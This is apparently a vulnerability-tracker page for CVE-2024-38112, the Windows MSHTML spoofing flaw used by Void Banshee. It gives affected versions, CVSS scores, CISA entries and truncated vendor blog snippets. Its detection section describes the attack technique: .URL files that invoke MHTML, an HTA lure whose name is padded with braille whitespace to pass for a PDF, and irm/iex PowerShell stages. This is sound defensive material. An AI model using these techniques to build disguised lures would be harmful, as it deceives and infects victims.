CVE-2024-38112
published 2024-07-09CVE-2024-38112: Windows MSHTML Platform Spoofing Vulnerability Windows MSHTML Platform Spoofing Vulnerability
high7.5CVSS 3.1
AVNACHPRNUIRSUCHIHAH
KEVITW
CISA Known Exploited Vulnerabilitydue 2024-07-30
Exploited in the wild
EPSS
84.34%
99.7th percentile
Windows MSHTML Platform Spoofing Vulnerability
Windows MSHTML Platform Spoofing Vulnerability
Affected
31 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | windows_10_version_1507 | >= 10.0.10240.0 < 10.0.10240.20710 | 10.0.10240.20710 |
| microsoft | windows_10_version_1607 | >= 10.0.14393.0 < 10.0.14393.7159 | 10.0.14393.7159 |
| microsoft | windows_10_version_1809 | >= 10.0.17763.0 < 10.0.17763.6054 | 10.0.17763.6054 |
| microsoft | windows_10_version_21h2 | >= 10.0.19043.0 < 10.0.19044.4651 | 10.0.19044.4651 |
| microsoft | windows_10_version_22h2 | >= 10.0.19045.0 < 10.0.19045.4651 | 10.0.19045.4651 |
| microsoft | windows_11_version_21h2 | >= 10.0.0 < 10.0.22000.3079 | 10.0.22000.3079 |
| microsoft | windows_11_version_22h2 | >= 10.0.22621.0 < 10.0.22621.3880 | 10.0.22621.3880 |
| microsoft | windows_11_version_22h3 | >= 10.0.22631.0 < 10.0.22631.3880 | 10.0.22631.3880 |
| microsoft | windows_11_version_23h2 | >= 10.0.22631.0 < 10.0.22631.3880 | 10.0.22631.3880 |
| microsoft | windows_server_2008_service_pack_2 | >= 6.0.6003.0 < 6.0.6003.22769 | 6.0.6003.22769 |
| microsoft | windows_server_2012_r2 | >= 6.3.9600.0 < 6.3.9600.22074 | 6.3.9600.22074 |
| microsoft | windows_server_2016 | >= 10.0.14393.0 < 10.0.14393.7159 | 10.0.14393.7159 |
| microsoft | windows_server_2019 | >= 10.0.17763.0 < 10.0.17763.6054 | 10.0.17763.6054 |
| microsoft | windows_server_2022 | >= 10.0.20348.0 < 10.0.20348.2582 | 10.0.20348.2582 |
| msrc | windows_10 | — | — |
| msrc | windows_10_version_1607 | — | — |
| msrc | windows_10_version_1809 | — | — |
| msrc | windows_10_version_21h2 | — | — |
| msrc | windows_10_version_22h2 | — | — |
| msrc | windows_11_version_21h2 | — | — |
| msrc | windows_11_version_22h2 | — | — |
| msrc | windows_11_version_23h2 | — | — |
| msrc | windows_11_version_24h2 | — | — |
| msrc | windows_server_2008 | — | — |
| msrc | windows_server_2008_r2 | — | — |
Detection & IOCsextracted from sources · hover to see the quote
filenameBooks_A0UJKO.pdf%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80.hta↗
bytes↗
%E2%A0%80
- →Detect .URL shortcut files containing the MHTML protocol handler combined with the x-usc! directive in the URL parameter — this is the core exploit mechanism for CVE-2024-38112. ↗
- →Alert on iexplore.exe spawning child processes or making outbound network connections, especially to download HTA files — IE is disabled and should not be initiating such activity. ↗
- →Hunt for HTA filenames containing 26 repeated encoded braille whitespace characters (%E2%A0%80) used to hide the .hta extension and masquerade as PDF files. ↗
- →Detect VBScript within HTA files performing XOR decryption (key 4) followed by PowerShell execution — characteristic of Stage 3 of the Void Banshee chain. ↗
- →Monitor for Win32_Process WMI class usage spawned from PowerShell scripts downloaded via irm/iex — used in Stage 3 to launch the next stage payload. ↗
- →Look for internet shortcut (.URL) files with a PDF icon but .url extension distributed via zip archives — Void Banshee changed the default icon of an internet shortcut file to that of a PDF file. ↗
- →Detect Windows Internet Shortcut files (.url extension) that, when clicked, invoke Internet Explorer (iexplore.exe) to visit attacker-controlled URLs rather than opening in Edge. ↗
- ·The MHTML handler has been unregistered from Internet Explorer as part of the July 2024 Patch Tuesday fix, meaning MHTML is no longer usable inside internet shortcut files on patched systems — detections targeting this vector are most relevant for unpatched hosts. ↗
- ·The CVE-2024-43461 fix for the braille whitespace extension-hiding technique is incomplete — whitespace is not stripped, only the actual .hta extension is now shown, which may still confuse users. ↗
- ·There is disagreement between the original discoverers (ZDI/Trend Micro) and Microsoft on the severity — ZDI classifies CVE-2024-38112 as a remote code execution vulnerability warranting a critical rating, while Microsoft disclosed it as a spoofing vulnerability with a lower CVSS score. ↗
CVSS provenance
nvdv3.17.5HIGHCVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
cvelistv57.5HIGH
vulncheck8.8HIGH
cisa7.5HIGH
vendor_msrc8.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
CVEList
Windows MSHTML Platform Spoofing Vulnerability
cvelistv5·2024-07-09·CVSS 7.5
CVE-2024-38112 [HIGH] CWE-451 Windows MSHTML Platform Spoofing Vulnerability
Windows MSHTML Platform Spoofing Vulnerability
Windows MSHTML Platform Spoofing Vulnerability
VulnCheck
Microsoft Windows MSHTML Platform Spoofing Vulnerability
vulncheck·2024·CVSS 7.5
CVE-2024-38112 [HIGH] CWE-451 Microsoft Windows MSHTML Platform Spoofing Vulnerability
Microsoft Windows MSHTML Platform Spoofing Vulnerability
Microsoft Windows MSHTML Platform contains a spoofing vulnerability that has a high impact to confidentiality, integrity, and availability.
Affected: Microsoft Windows
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://api.msrc.microsoft.com/cvrf/v3.0/cvrf/2024-Jul; https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38112; https://research.checkpoint.com/2024/resurrecting-internet-explorer-threat-actors-using-zero-day-tricks-in-internet-shortcut-file-to-lure-victims-cve-2024-38112/; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://www.trendmicro.com/en_us/research/24/g/
VulnCheck
Microsoft Windows MSHTML Platform Spoofing Vulnerability
vulncheck·2024·CVSS 7.5
CVE-2024-43461 [HIGH] CWE-451 Microsoft Windows MSHTML Platform Spoofing Vulnerability
Microsoft Windows MSHTML Platform Spoofing Vulnerability
Microsoft Windows MSHTML Platform contains a user interface (UI) misrepresentation of critical information vulnerability that allows an attacker to spoof a web page. This vulnerability was exploited in conjunction with CVE-2024-38112.
Affected: Microsoft Windows
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://api.msrc.microsoft.com/cvrf/v3.0/cvrf/2024-Sep; https://www.zerodayinitiative.com/blog/2024/9/10/the-september-2024-security-update-review; https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2024-43461; https://www.bleepingcomputer.com/news/security/windows-vulnerability-abused-braille-spaces-in-zero-day-atta
VulnCheck
Microsoft Windows SmartScreen Security Feature Bypass Vulnerability
vulncheck·2023·CVSS 8.8
CVE-2023-36025 [HIGH] Microsoft Windows SmartScreen Security Feature Bypass Vulnerability
Microsoft Windows SmartScreen Security Feature Bypass Vulnerability
Microsoft Windows SmartScreen contains a security feature bypass vulnerability that could allow an attacker to bypass Windows Defender SmartScreen checks and their associated prompts.
Affected: Microsoft Windows
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Known Ransomware Campaign Use: Known
Exploitation References: https://api.msrc.microsoft.com/cvrf/v3.0/cvrf/2023-Nov; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://twitter.com/ffforward/status/1726540034462159165; https://www.trendmicro.com/en_us/research/24/a/cve-2023-36025-exploited-for-defense-evasion-in-phemedrone-steal.html; https://uni
VulnCheck
Microsoft MSHTML Remote Code Execution Vulnerability
vulncheck·2021·CVSS 8.8
CVE-2021-40444 [HIGH] CWE-22 Microsoft MSHTML Remote Code Execution Vulnerability
Microsoft MSHTML Remote Code Execution Vulnerability
Microsoft MSHTML contains a unspecified vulnerability that allows for remote code execution.
Affected: Microsoft MSHTML
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://api.msrc.microsoft.com/cvrf/v3.0/cvrf/2021-Sep; https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit; https://www.microsoft.com/en-us/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/; https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/; https://www.riskiq.com/blog/external-threat-management/wizard-spider-windows-0day-exploit/; https://www.
CISA
Microsoft Windows MSHTML Platform Spoofing Vulnerability
cisa·2024-09-16·CVSS 7.5
CVE-2024-43461 [HIGH] CWE-451 Microsoft Windows MSHTML Platform Spoofing Vulnerability
Vulnerability: Microsoft Windows MSHTML Platform Spoofing Vulnerability
Affected: Microsoft Windows
Microsoft Windows MSHTML Platform contains a user interface (UI) misrepresentation of critical information vulnerability that allows an attacker to spoof a web page. This vulnerability was exploited in conjunction with CVE-2024-38112.
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-43461 ; https://nvd.nist.gov/vuln/detail/CVE-2024-43461
Remediation Due Date: 2024-10-07
Microsoft
Windows MSHTML Platform Spoofing Vulnerability
vendor_msrc·2024-09-10·CVSS 8.8
CVE-2024-43461 [HIGH] CWE-451 Windows MSHTML Platform Spoofing Vulnerability
Windows MSHTML Platform Spoofing Vulnerability
FAQ: The Security Updates table indicates that this vulnerability affects all supported versions of Microsoft Windows. Why are IE Cumulative updates listed for Windows Server 2008, Windows Server 2008 R2, Windows Server 2012, and Windows Server 2012 R2?
While Microsoft has announced retirement of the Internet Explorer 11 application on certain platforms and the Microsoft Edge Legacy application is deprecated, the underlying MSHTML, EdgeHTML, and scripting platforms are still supported. The MSHTML platform is used by Internet Explorer mode in Microsoft Edge as well as other applications through WebBrowser control. The EdgeHTML platform is used by WebView and some UWP applications. The scripting platforms are used by MSHTML and EdgeHTML but can
CISA
Microsoft Windows MSHTML Platform Spoofing Vulnerability
cisa·2024-07-09·CVSS 7.5
CVE-2024-38112 [HIGH] CWE-451 Microsoft Windows MSHTML Platform Spoofing Vulnerability
Vulnerability: Microsoft Windows MSHTML Platform Spoofing Vulnerability
Affected: Microsoft Windows
Microsoft Windows MSHTML Platform contains a spoofing vulnerability that has a high impact to confidentiality, integrity, and availability.
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38112; https://nvd.nist.gov/vuln/detail/CVE-2024-38112
Remediation Due Date: 2024-07-30
Microsoft
Windows MSHTML Platform Spoofing Vulnerability
vendor_msrc·2024-07-09·CVSS 7.5
CVE-2024-38112 [HIGH] CWE-451 Windows MSHTML Platform Spoofing Vulnerability
Windows MSHTML Platform Spoofing Vulnerability
FAQ: According to the CVSS metric, the attack complexity is high (AC:H). What does that mean for this vulnerability?
Successful exploitation of this vulnerability requires an attacker to take additional actions prior to exploitation to prepare the target environment.
FAQ: According to the CVSS metric, user interaction is required (UI:R). What interaction would the user have to do?
An attacker would have to send the victim a malicious file that the victim would have to execute.
Windows MSHTML Platform: Windows MSHTML Platform
Microsoft: Microsoft
Customer Action Required: Yes
Impact: Spoofing
Exploit Status: Publicly Disclosed:No;Exploited:Yes;Latest Software Release:Exploitation Detected
Reference: https://catalog.update.microsoft.com/
No detection rules found.
No public exploits indexed.
Tenable
Microsoft Patch Tuesday 2024 Year in Review
blogs_tenable·2024-12-10
Microsoft Patch Tuesday 2024 Year in Review
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Securelist
Exploits and vulnerabilities in Q3 2024
blogs_securelist·2024-12-06·CVSS 8.1
CVE-2024-47177 [HIGH] Exploits and vulnerabilities in Q3 2024
Table of Contents
Statistics on registered vulnerabilities
Exploitation statistics
Windows and Linux vulnerability exploitation
Most prevalent exploits
Vulnerability exploitation in APT attacks
Interesting vulnerabilities
CVE-2024-47177 (CUPS filters)
CVE-2024-38112 (MSHTML Spoofing)
CVE-2024-6387 (regreSSHion)
CVE-2024-3183 (Free IPA)
CVE-2024-45519 (Zimbra)
CVE-2024-5290 (Ubuntu wpa_supplicant)
Conclusion and advice
Authors
Alexander Kolesnikov
Q3 2024 saw multiple vulnerabilities discovered in Windows and Linux subsystems that are not standard for cyberattacks. This is because operating system developers have been releasing new security mitigations for whole sets of vulnerabilities in commonly used subsystems. For example, a log integrity check is set to appear in the Co
Securelist
Analyzing the vulnerability landscape in Q3 2024
blogs_securelist·2024-12-06·CVSS 8.1
CVE-2024-47177 [HIGH] Analyzing the vulnerability landscape in Q3 2024
Table of Contents
- Statistics on registered vulnerabilities
- Exploitation statistics
- Vulnerability exploitation in APT attacks
- Interesting vulnerabilities
- CVE-2024-47177 (CUPS filters)
- CVE-2024-38112 (MSHTML Spoofing)
- CVE-2024-6387 (regreSSHion)
- CVE-2024-3183 (Free IPA)
- CVE-2024-45519 (Zimbra)
- CVE-2024-5290 (Ubuntu wpa_supplicant)
- Conclusion and advice
Authors
- Alexander Kolesnikov
Q3 2024 saw multiple vulnerabilities discovered in Windows and Linux subsystems that are not standard for cyberattacks. This is because operating system developers have been releasing new security mitigations for whole sets of vulnerabilities in commonly used subsystems. For example, a log integrity check is set to appear in the Common Log Filing System (CLFS) in Windows, so the number
Tenable
Microsoft’s October 2024 Patch Tuesday Addresses 117 CVEs (CVE-2024-43572, CVE-2024-43573)
blogs_tenable·2024-10-08·CVSS 7.8
[HIGH] Microsoft’s October 2024 Patch Tuesday Addresses 117 CVEs (CVE-2024-43572, CVE-2024-43573)
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Bleepingcomputer
CISA warns of Windows flaw used in infostealer malware attacks
blogs_bleepingcomputer·2024-09-16·CVSS 7.5
CVE-2024-38112 [HIGH] CISA warns of Windows flaw used in infostealer malware attacks
## CISA warns of Windows flaw used in infostealer malware attacks
## Sergiu Gatlan
"We released a fix for CVE-2024-38112 in our July 2024 security updates which broke this attack chain," it said. "Customers should both the July 2024 and September 2024 security update to fully protect themselves."
Peter Girnus, the Trend Micro Zero Day Initiative (ZDI) threat researcher who reported the security flaw, told BleepingComputer that Void Banshee hackers exploited it in zero-day attacks to install information-stealing malware.
The vulnerability enables remote attackers to execute arbitrary code on unpatched Windows systems by tricking the targets into visiting a maliciously crafted webpage or opening a malicious file.
"The specific flaw exists within the way Internet Explorer prompts the use
Bleepingcomputer
Windows vulnerability abused braille “spaces” in zero-day attacks
blogs_bleepingcomputer·2024-09-15·CVSS 7.5
CVE-2024-43461 [HIGH] Windows vulnerability abused braille “spaces” in zero-day attacks
## Windows vulnerability abused braille “spaces” in zero-day attacks
## Lawrence Abrams
Void Banshee is an APT hacking group first tracked by Trend Micro that targets organizations in North America, Europe, and Southeast Asia to steal data and for financial gain.
## The CVE-2024-43461 zero-day
In July, Check Point Research and Trend Micro both reported on the same attacks that exploited Windows zero-days to infect devices with the Atlantida info-stealer , used to steal passwords, authentication cookies, and cryptocurrency wallets from infected devices.
The attacks utilized zero-days tracked as CVE-2024-38112 (fixed in July) and CVE-2024-43461 (fixed this month) as part of the attack chain.
The discovery of the CVE-2024-38112 zero-day was attributed to Check Point researcher Haifei Li
Qualys
Cybersecurity Threat Landscape 2024 Midyear Review
blogs_qualys·2024-08-06
Cybersecurity Threat Landscape 2024 Midyear Review
## Table of Contents
Key Takeaways from the Threat Landscape Report 2024
Vulnerability and Threat Analysis in the Cybersecurity Landscape 2024
Cyber Threat Landscape 2024 A Detailed Review
Key Statistics and Their Impact on the 2024 Cybersecurity Landscape
Mid-2024s Most Exploited Vulnerabilities in the Cybersecurity Landscape
Conclusion
As we navigate the complexities of 2024, it’s crucial to pause and reflect on the evolving threat landscape that surrounds us. This moment offers a unique opportunity to scrutinize our triumphs and missteps, understand the events that have decisively shaped our environment, and consider those that have subtly influenced it. By extracting key lessons from our recent experiences, we can fortify our strategies and prepare more effectively for the emerg
Talos
It's best to just assume you’ve been involved in a data breach somehow
blogs_talos·2024-07-18
It's best to just assume you’ve been involved in a data breach somehow
Between AT&T, all the follow-on activity from Snowflake, Microsoft Outlook, and more, it’s best to probably just assume at this point that your personal information has somehow been involved in a data breach.
We’re only halfway through 2024, and we’ve already seen some of the largest data breaches and leaks in history. Telecommunications provider AT&T disclosed earlier this month that adversaries stole a cache of data that contained the phone numbers and call records of “nearly all” of its customers, which equates to about 110 million people.
Even if you’ve yet to receive the dreaded boilerplate notification email from any company, it’s probably just best for all of us to assume that some of our personal information has been accessed, leaked or stolen over the past few years, or it’s goi
Talos
It's best to just assume you’ve been involved in a data breach somehow
blogs_talos·2024-07-18
It's best to just assume you’ve been involved in a data breach somehow
## It's best to just assume you’ve been involved in a data breach somehow
Between AT&T , all the follow-on activity from Snowflake , Microsoft Outlook , and more, it’s best to probably just assume at this point that your personal information has somehow been involved in a data breach.
We’re only halfway through 2024, and we’ve already seen some of the largest data breaches and leaks in history. Telecommunications provider AT&T disclosed earlier this month that adversaries stole a cache of data that contained the phone numbers and call records of “nearly all” of its customers , which equates to about 110 million people.
Even if you’ve yet to receive the dreaded boilerplate notification email from any company, it’s probably just best for all of us to assume that some of our personal infor
Trendmicro
CVE-2024-38112: Void Banshee Targets Windows Users Through Zombie Internet Explorer in Zero-Day Attacks
blogs_trendmicro·2024-07-15·CVSS 7.5
CVE-2024-38112 [HIGH] CVE-2024-38112: Void Banshee Targets Windows Users Through Zombie Internet Explorer in Zero-Day Attacks
Exploits & Vulnerabilities
## CVE-2024-38112: Void Banshee Targets Windows Users Through Zombie Internet Explorer in Zero-Day Attacks
Our threat hunters discovered CVE-2024-38112, which was used as a zero-day by APT group Void Banshee, to access and execute files through the disabled Internet Explorer using MSHTML. We promptly identified and reported this zero-day vulnerability to Microsoft, and it has been patched.
By: Peter Girnus, Aliakbar Zahravi 2024/07/15 Read time: ( words)
Save to Folio
Report Highlights:
In May, ZDI threat hunters under Trend Micro’s Zero Day Initiative discovered a vulnerability that the APT group Void Banshee had been exploiting in an updated Atlantida Stealer campaign. We promptly identified and reported this as a zero-day vulnerability to Microsoft.
The
Trendmicro
CVE-2024-38112: Void Banshee Targets Windows Users Through Zombie Internet Explorer in Zero-Day Attacks
blogs_trendmicro·2024-07-15·CVSS 7.5
CVE-2024-38112 [HIGH] CVE-2024-38112: Void Banshee Targets Windows Users Through Zombie Internet Explorer in Zero-Day Attacks
Exploits y vulnerabilidades
## CVE-2024-38112: Void Banshee Targets Windows Users Through Zombie Internet Explorer in Zero-Day Attacks
Our threat hunters discovered CVE-2024-38112, which was used as a zero-day by APT group Void Banshee, to access and execute files through the disabled Internet Explorer using MSHTML. We promptly identified and reported this zero-day vulnerability to Microsoft, and it has been patched.
By: Peter Girnus, Aliakbar Zahravi Jul 15, 2024 Read time: ( words)
Save to Folio
Report Highlights:
In May, ZDI threat hunters under Trend Micro’s Zero Day Initiative discovered a vulnerability that the APT group Void Banshee had been exploiting in an updated Atlantida Stealer campaign. We promptly identified and reported this as a zero-day vulnerability to Microsoft.
Trendmicro
CVE-2024-38112: Void Banshee Targets Windows Users Through Zombie Internet Explorer in Zero-Day Attacks
blogs_trendmicro·2024-07-15·CVSS 7.5
CVE-2024-38112 [HIGH] CVE-2024-38112: Void Banshee Targets Windows Users Through Zombie Internet Explorer in Zero-Day Attacks
Ausnutzung von Schwachstellen
## CVE-2024-38112: Void Banshee Targets Windows Users Through Zombie Internet Explorer in Zero-Day Attacks
Our threat hunters discovered CVE-2024-38112, which was used as a zero-day by APT group Void Banshee, to access and execute files through the disabled Internet Explorer using MSHTML. We promptly identified and reported this zero-day vulnerability to Microsoft, and it has been patched.
By: Peter Girnus, Aliakbar Zahravi Jul 15, 2024 Read time: ( words)
Save to Folio
Report Highlights:
In May, ZDI threat hunters under Trend Micro’s Zero Day Initiative discovered a vulnerability that the APT group Void Banshee had been exploiting in an updated Atlantida Stealer campaign. We promptly identified and reported this as a zero-day vulnerability to Microsoft.
Trendmicro
Uncoordinated Vulnerability Disclosure: The Continuing Issues with CVD
blogs_trendmicro·2024-07-15·CVSS 7.5
CVE-2024-38112 [HIGH] Uncoordinated Vulnerability Disclosure: The Continuing Issues with CVD
# Uncoordinated Vulnerability Disclosure: The Continuing Issues with CVD
Learn about the uncoordinate vulnerability disclosure and the continuing issues with cvd.
By: Dustin Childs
2024/07/15
Read time: ( words)
Save to Folio
On patch Tuesday last week, Microsoft released an update for CVE-2024-38112, which they said was being exploited in the wild. We at the Trend Micro Zero Day Initiative (ZDI) agree with them because that’s what we told them back in May when we detected this exploit in the wild and reported it to Microsoft. However, you may notice that no one from Trend or ZDI was acknowledged by Microsoft. This case has become a microcosm of the problems with coordinated vulnerability disclosure (CVD) as vendors push for coordinated disclosure from researchers but rarely practice
Trendmicro
Uncoordinated Vulnerability Disclosure: The Continuing Issues with CVD
blogs_trendmicro·2024-07-15·CVSS 7.5
CVE-2024-38112 [HIGH] Uncoordinated Vulnerability Disclosure: The Continuing Issues with CVD
## Uncoordinated Vulnerability Disclosure: The Continuing Issues with CVD
Learn about the uncoordinate vulnerability disclosure and the continuing issues with cvd.
By: Dustin Childs 2024/07/15 Read time: ( words)
Save to Folio
On patch Tuesday last week, Microsoft released an update for CVE-2024-38112 , which they said was being exploited in the wild. We at the Trend Micro Zero Day Initiative (ZDI) agree with them because that’s what we told them back in May when we detected this exploit in the wild and reported it to Microsoft. However, you may notice that no one from Trend or ZDI was acknowledged by Microsoft. This case has become a microcosm of the problems with coordinated vulnerability disclosure (CVD) as vendors push for coordinated disclosure from researchers but rarely practice
Trendmicro
CVE-2024-38112: Void Banshee Targets Windows Users Through Zombie Internet Explorer in Zero-Day Attacks
blogs_trendmicro·2024-07-15·CVSS 7.5
CVE-2024-38112 [HIGH] CVE-2024-38112: Void Banshee Targets Windows Users Through Zombie Internet Explorer in Zero-Day Attacks
Exploits & Vulnerabilities
## CVE-2024-38112: Void Banshee Targets Windows Users Through Zombie Internet Explorer in Zero-Day Attacks
Our threat hunters discovered CVE-2024-38112, which was used as a zero-day by APT group Void Banshee, to access and execute files through the disabled Internet Explorer using MSHTML. We promptly identified and reported this zero-day vulnerability to Microsoft, and it has been patched.
By: Peter Girnus, Aliakbar Zahravi Jul 15, 2024 Read time: ( words)
Save to Folio
Report Highlights:
In May, ZDI threat hunters under Trend Micro’s Zero Day Initiative discovered a vulnerability that the APT group Void Banshee had been exploiting in an updated Atlantida Stealer campaign. We promptly identified and reported this as a zero-day vulnerability to Microsoft.
T
Checkpoint
15th July – Threat Intelligence Report
blogs_checkpoint·2024-07-15
CVE-2024-38112 15th July – Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 15th July – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 15th July, please download our Threat Intelligence Bulletin .
TOP ATTACKS AND BREACHES
American telecom giant AT&T has disclosed a massive data breach that exposed personal information of 110M of its customers. The data was stolen from the company’s workspace on a third-party cloud platform, referring to Snowflake. The leaked data allegedly includes the full metadata of all of AT&T mobile customers, which can be
Trendmicro
CVE-2024-38112: Void Banshee Targets Windows Users Through Zombie Internet Explorer in Zero-Day Attacks
blogs_trendmicro·2024-07-15·CVSS 7.5
CVE-2024-38112 [HIGH] CVE-2024-38112: Void Banshee Targets Windows Users Through Zombie Internet Explorer in Zero-Day Attacks
Exploits & Vulnerabilities
# CVE-2024-38112: Void Banshee Targets Windows Users Through Zombie Internet Explorer in Zero-Day Attacks
Our threat hunters discovered CVE-2024-38112, which was used as a zero-day by APT group Void Banshee, to access and execute files through the disabled Internet Explorer using MSHTML. We promptly identified and reported this zero-day vulnerability to Microsoft, and it has been patched.
By: Peter Girnus, Aliakbar Zahravi
2024/07/15
Read time: ( words)
Save to Folio
Report Highlights:
- In May, ZDI threat hunters under Trend Micro’s Zero Day Initiative discovered a vulnerability that the APT group Void Banshee had been exploiting in an updated Atlantida Stealer campaign. We promptly identified and reported this as a zero-day vulnerability to Microsoft.
-
Trendmicro
The July 2024 Security Update Review
blogs_trendmicro·2024-07-09
The July 2024 Security Update Review
## The July 2024 Security Update Review
Get the July 2024 security update and review.
By: Dustin Childs 2024/07/09 Read time: ( words)
Save to Folio
We’re just past the halfway point of 2024, and as expected, Microsoft and Adobe have released their regularly scheduled updates. Take a break from your regular activities and join us as we review the details of their latest security alerts. If you’d rather watch the full video recap covering the entire release, you can check it out here:
Adobe Patches for July 2024
For July, Adobe released three patches addressing seven CVEs in Adobe Premiere Pro, InDesign, and Adobe Bridge. The patch for InDesign is the largest, fixing four Critical-rated CVEs. All four could lead to arbitrary code execution. The fix for Premiere Pro fixes a single CVE
Krebs
Microsoft Patch Tuesday, July 2024 Edition
blogs_krebs·2024-07-09·CVSS 9.8
CVE-2024-38080 [CRITICAL] Microsoft Patch Tuesday, July 2024 Edition
Microsoft Corp. today issued software updates to plug at least 139 security holes in various flavors of Windows and other Microsoft products. Redmond says attackers are already exploiting at least two of the vulnerabilities in active attacks against Windows users.
The first Microsoft zero-day this month is CVE-2024-38080 , a bug in the Windows Hyper-V component that affects Windows 11 and Windows Server 2022 systems. CVE-2024-38080 allows an attacker to increase their account privileges on a Windows machine. Although Microsoft says this flaw is being exploited, it has offered scant details about its exploitation.
The other zero-day is CVE-2024-38112 , which is a weakness in MSHTML , the proprietary engine of Microsoft’s Internet Explorer web browser. Kevin Breen , senior director of thre
Tenable
Microsoft’s July 2024 Patch Tuesday Addresses 138 CVEs (CVE-2024-38080, CVE-2024-38112)
blogs_tenable·2024-07-09·CVSS 7.8
[HIGH] Microsoft’s July 2024 Patch Tuesday Addresses 138 CVEs (CVE-2024-38080, CVE-2024-38112)
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Qualys
Microsoft and Adobe Patch Tuesday, July 2024 Security Update Review
blogs_qualys·2024-07-09
Microsoft and Adobe Patch Tuesday, July 2024 Security Update Review
## Table of Contents
Microsoft Patch Tuesday for July 2024
Adobe Patches for July 2024
Zero-day Vulnerabilities Patched in July Patch Tuesday Edition
Critical Severity Vulnerabilities Patched in July Patch Tuesday Edition
Other Microsoft Vulnerability Highlights
Microsoft Release Summary
Discover and Prioritize Vulnerabilities inVulnerability Management, Detection & Response (VMDR)
Rapid Response withPatch Management (PM)
EVALUATE Vendor-Suggested Mitigation with Policy Compliance (PC)
Qualys Monthly Webinar Series
July’s Patch Tuesday brings a midsummer wave of updates, addressing critical vulnerabilities and enhancing security across the Microsoft ecosystem. Let’s discover the highlights from Microsoft’s Patch Tuesday updates for July 2024.
## Microsoft Patch Tuesday for July
Checkpoint
Resurrecting Internet Explorer: Threat Actors Using Zero-day Tricks in Internet Shortcut File to Lure Victims (CVE-2024-38112)
blogs_checkpoint·2024-07-09·CVSS 8.8
CVE-2024-38112 [HIGH] Resurrecting Internet Explorer: Threat Actors Using Zero-day Tricks in Internet Shortcut File to Lure Victims (CVE-2024-38112)
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
AI Research 2
Android Malware 23
Artificial Intelligence 4
ChatGPT 3
Check Point Research Publications 455
Cloud Security 1
CPRadio 44
Crypto 2
Data & Threat Intelligence 2
Data Analysis 0
Demos 22
Global Cyber Attack Reports 408
How To Guides 13
Ransomware 5
Russo-Ukrainian War 1
Security Report 1
Threat and data analysis 0
